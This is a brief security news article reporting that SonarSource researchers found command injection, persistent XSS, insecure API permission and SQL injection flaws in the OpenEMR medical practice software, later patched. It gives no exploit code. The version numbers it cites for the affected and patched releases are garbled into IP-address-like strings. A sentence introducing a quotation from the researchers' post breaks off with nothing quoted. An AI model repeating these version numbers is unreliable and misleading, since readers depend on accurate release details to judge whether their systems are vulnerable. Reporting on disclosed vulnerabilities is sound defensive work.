Researchers have found numerous security vulnerabilities in OpenEMR software. Exploiting these vulnerabilities could allow an attacker to compromise the medical portal to gain access to sensitive records.
Multiple OpenEMR Vulnerabilities Discovered
Researchers from SonarSource discovered multiple different security vulnerabilities while analyzing OpenEMR software.
OpenEMR is basically an opensource software facilitating online medical practice management. Various medical facilities globally use this software to maintain patients’ data, health records and help patients communicate with physicians and schedule appointments.
Specifically, the researchers found four different security bugs in the software. These include a command injection vulnerability, persistent cross-site scripting (XSS), insecure API permissions, and SQL injection flaw.
For a successful attack, an adversary could inject malicious codes to the Patients’ Portal at the users’ end. As described in the post,
After that, the execution of the malicious JS could further allow exploiting other bugs in the backend to take over the entire server and steal patients’ data.
The following video demonstrates a successful attack scenario.
Patch Rolled Out
The vulnerabilities primarily affected the OpenEMR 220.127.116.11. Upon discovering the bugs, the researchers reached out to OpenEMR vendors who eventually addressed all the bugs with the release of version 18.104.22.168.
Users can visit this OpenEMR web page here to find and download the patches that the firm released in August 2020.
The researchers have only disclosed these findings lately to let most users install the patches.
Since the bugs have been publicly disclosed now, all users must ensure quickly updating their respective systems to the patched OpenEMR version, if not done already.